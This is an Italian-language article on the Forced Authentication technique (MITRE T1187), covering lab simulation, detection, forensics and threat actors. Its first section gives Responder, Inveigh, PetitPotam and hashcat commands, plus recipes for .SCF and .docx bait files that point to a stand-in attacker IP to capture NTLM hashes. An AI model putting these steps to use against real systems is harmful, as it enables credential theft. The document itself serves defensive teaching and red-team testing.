Autenticazione Forzata: Forced Authentication (T1187)

Per simulare la Forced Authentication in laboratorio servono due elementi: un listener che catturi gli hash NTLM e un file esca che inneschi l'autenticazione automatica. L'intera catena può essere replicata con tool open source senza necessità di exploit complessi.

Cattura degli hash con Responder. Responder (open source) è il tool di riferimento per intercettare autenticazioni NTLM/LLMNR/NBT-NS su rete. Per avviarlo in modalità di ascolto sull'interfaccia di rete del laboratorio:

sudo python3 Responder.py -I eth0 -wrfv

Il flag -w abilita il server WPAD, -r risponde alle richieste NetBIOS, -f forza l'autenticazione e -v attiva il verbose. In alternativa, su ambienti Windows, Inveigh (open source) offre funzionalità analoghe in PowerShell:

Invoke-Inveigh -NBNS Y -LLMNR Y -ConsoleOutput Y

Creazione dei file esca. Il vettore più diretto è un file .SCF posizionato in una cartella condivisa o sul desktop di un utente. Il contenuto è minimo: la sezione [Shell] con IconFile=\\<IP-ATTACCANTE>\share\icon.ico forza Windows a risolvere l'icona via SMB appena la cartella viene visualizzata in Explorer. In modo analogo, un file .LNK può avere l'attributo icon path impostato su un percorso UNC esterno.

Per il vettore documentale, è sufficiente un file .docx con template injection. Nel file word/_rels/settings.xml.rels si modifica il Target del relationship in modo che punti a file://<IP-ATTACCANTE>/template.dotm. Quando la vittima apre il documento, Word tenta di caricare il template e invia l'hash NTLMv2 al listener.

Simulazione PetitPotam. Per testare il vettore EFSRPC, PetitPotam (open source) permette di forzare l'autenticazione da un domain controller verso un host controllato:

python3 PetitPotam.py <IP-LISTENER> <IP-TARGET>

Il tool invoca EfsRpcOpenFileRaw e il target negozia automaticamente NTLM verso il listener. Questo scenario è particolarmente critico perché consente NTLM relay verso Active Directory Certificate Services.

Cracking offline. Gli hash catturati da Responder vengono salvati in file di log nella directory logs/. Per il cracking con hashcat (open source):

hashcat -m 5600 hash.txt wordlist.txt

Il modulo 5600 corrisponde a NTLMv2. Con una wordlist robusta e regole di mutazione, password deboli cadono in pochi minuti. È consigliabile documentare ogni test con timestamp e scope approvato dal committente.

Il cuore della detection per questa tecnica è la correlazione tra due eventi: la comparsa di un file esca in una posizione utente e una connessione NTLM in uscita verso una destinazione non fidata. Presi singolarmente, entrambi gli eventi sono comuni; insieme diventano un segnale ad alta fedeltà.

Log source critici. Sysmon è la base imprescindibile. L'EventCode 11 (FileCreate) cattura la creazione di file con estensioni sospette — .scf, .lnk, .url, .doc — nelle cartelle più esposte: Desktop, Public, Downloads, Temp, cartelle di avvio e cache. L'EventCode 3 (NetworkConnect) registra invece le connessioni in uscita sulle porte TCP 139, 445 (SMB) e 80, 443 (WebDAV) verso IP non appartenenti alla rete interna.

La regola di correlazione lega i due eventi tramite hostname sorgente e finestra temporale. Il tuning suggerito prevede un orizzonte di 15-30 minuti tra l'accesso al file e il tentativo NTLM outbound. Se il SOC ha visibilità sui flussi di rete (NetFlow o NSM), la stessa correlazione può essere arricchita con i dati di sessione SMB per identificare tentativi ripetuti dallo stesso host o, peggio ancora, da host multipli — pattern che suggerisce un file esca posizionato su una share condivisa.

Indicatori comportamentali da monitorare. Un segnale particolarmente forte è il traffico SMB workstation-to-external: in ambienti enterprise, le workstation comunicano via SMB con file server interni, quasi mai con IP pubblici. Una regola che filtra connessioni SMB uscenti verso CIDR non aziendali, escludendo i gateway WebDAV legittimi con allowlist, genera pochissimi falsi positivi.

Per il vettore template injection, l'EventCode 1 di Sysmon (ProcessCreate) può rivelare processi Office che generano connessioni SMB anomale. Monitorare winword.exe o excel.exe che stabiliscono connessioni su porta 445 verso IP esterni è un indicatore ad alta priorità.

Controlli preventivi. Il filtraggio del traffico di rete è la mitigazione più efficace: bloccare il traffico SMB in uscita (TCP 139, 445 e UDP 137) con regole firewall perimetrali elimina il canale di esfiltrazione degli hash. Il traffico WebDAV in uscita va limitato con allowlist se necessario o bloccato del tutto. La configurazione di policy password robuste — complessità minima di 12+ caratteri, rotazione periodica, blacklist di password compromesse — non impedisce la cattura dell'hash ma rende il cracking offline significativamente più costoso per l'attaccante.

I falsi positivi più comuni derivano da applicazioni legittime che accedono a risorse WebDAV esterne o da scanner di vulnerabilità interni. Mantenere aggiornata la lista delle destinazioni autorizzate è essenziale per la salute delle regole.

L'analisi forense di un episodio di Forced Authentication richiede la ricostruzione di due momenti distinti: il posizionamento del file esca e il flusso di autenticazione forzata. Entrambi lasciano tracce solide sui sistemi Windows.

Il file esca come punto di partenza. Il primo artefatto da cercare è il file che ha innescato l'autenticazione. I percorsi più probabili sono Desktop, Public, Downloads, cartelle temporanee e cartelle di avvio automatico. La Master File Table ($MFT) registra timestamp di creazione e modifica per ogni file sul volume NTFS: un .SCF o .LNK creato in una directory utente con timestamp anomalo — ad esempio fuori orario lavorativo o immediatamente dopo l'arrivo di un'email di spearphishing — è un forte indicatore.

Per i file .LNK, lo strumento LECmd (open source, parte della suite Eric Zimmerman Tools) analizza la struttura interna e rivela il percorso dell'icona, incluso l'indirizzo UNC remoto. Per i documenti Office con template injection, l'esame del file word/_rels/settings.xml.rels tramite estrazione ZIP mostra il relationship con il target esterno. Lo strumento oletools (open source) e in particolare olevba e oleobj aiutano ad analizzare gli oggetti embedded.

Tracce di rete nei log di sistema. L'EventCode 3 di Sysmon è l'artefatto di rete più diretto sull'endpoint: registra IP di destinazione, porta e processo sorgente. Correlare questo evento con l'EventCode 4648 del Security Log di Windows — che documenta i logon espliciti con credenziali — permette di ricostruire il flusso completo: quale processo, su quale host, ha inviato credenziali a quale destinazione.

Se il traffico SMB è stato catturato a livello di rete, l'analisi delle sessioni NTLM con Wireshark (open source) rivela il challenge-response e conferma l'esfiltrazione dell'hash. Il filtro di visualizzazione ntlmssp isola rapidamente i pacchetti rilevanti.

Ricostruzione della timeline. La sequenza tipica da documentare è:

1. Arrivo del vettore iniziale (email con allegato o accesso a share) — log del mail server o del file server
2. Creazione/modifica del file esca nel filesystem — $MFT, USN Journal, Sysmon EventCode 11
3. Accesso utente al file o rendering automatico dell'icona — Sysmon EventCode 1 (processo Explorer o Office), Shellbags per la navigazione cartelle
4. Connessione NTLM outbound — Sysmon EventCode 3, firewall log, NetFlow
5. Eventuale attività post-compromise se l'hash è stato crackato o relayed — EventCode 4624 tipo 3 o 10 da IP anomali

I Shellbags nel registry dell'utente (NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU) documentano l'apertura della cartella contenente il file esca e possono confermare l'interazione umana. ShellBags Explorer (open source, Eric Zimmerman Tools) è lo strumento ideale per la loro analisi.

La Forced Authentication è impiegata da gruppi con obiettivi e TTPs distinti, ma accomunati dalla necessità di ottenere credenziali valide senza eseguire codice malevolo sull'endpoint della vittima.

DarkHydrus (G0079) è un gruppo orientato al Medio Oriente che ha sfruttato la template injection per far comparire una finestra di autenticazione agli utenti bersaglio. L'approccio è elegante nella sua semplicità: il documento aperto dalla vittima tenta di caricare un template remoto, Windows presenta il prompt di autenticazione e l'utente, abituato a inserire credenziali in contesti aziendali, le fornisce spontaneamente. Questa variante è particolarmente insidiosa perché non dipende dalla cattura passiva dell'hash, ma dall'interazione diretta dell'utente. Il gruppo è noto per combinare questa tecnica con altre forme di spearphishing mirato.

Dragonfly (G0035) rappresenta un profilo diverso, storicamente associato a operazioni contro il settore energetico. Il gruppo ha utilizzato due vettori distinti per la Forced Authentication: allegati di spearphishing contenenti link a risorse esterne che forzano il flusso SMB, e file .LNK modificati con risorse icona che puntano a server controllati dall'attaccante. Quest'ultimo metodo è particolarmente efficace per la raccolta persistente di credenziali da ambienti virtualizzati, poiché basta che un utente navighi nella cartella contenente il file .LNK perché Windows tenti di risolvere l'icona via SMB.

Sul versante software, EnvyScout (S0634) utilizza protocol handler del sistema operativo per indurre Windows a inviare risposte NTLMv2 verso infrastruttura controllata dall'avversario. La particolarità di questo malware è l'abuso dei gestori di protocollo nativi, un approccio che bypassa controlli basati sulla sola analisi dei documenti Office.

Pattern operativi trasversali. I gruppi che sfruttano questa tecnica condividono alcune caratteristiche rilevanti per la profilazione: privilegiano il low footprint sull'endpoint, preferiscono vettori che si attivano con l'interazione minima dell'utente (apertura cartella o documento), e combinano la raccolta credenziali con capacità di relay NTLM per il movimento laterale. Il trend evolutivo mostra un progressivo spostamento dai semplici file .SCF e .LNK — facilmente individuabili — verso template injection nei documenti Office e abuso di interfacce RPC come MS-EFSRPC, che offrono un profilo più basso.

Per il threat intel operativo, il monitoraggio delle infrastrutture di raccolta è cruciale: i server che ricevono gli hash devono essere raggiungibili via SMB o WebDAV, il che significa che spesso utilizzano porte standard e certificati che possono essere tracciati tramite scansioni passive e log Certificate Transparency.

Framework MITRE ATT&CK v16 — T1187 (Forced Authentication), TA0006, G0079, G0035, S0634, M1027, M1037. Tool di detection e analisi: Sysmon, Wireshark, LECmd, ShellBags Explorer, oletools. Tool offensivi per simulazione: Responder, Inveigh, PetitPotam, hashcat. Integrato con conoscenza professionale per tool e procedure operative.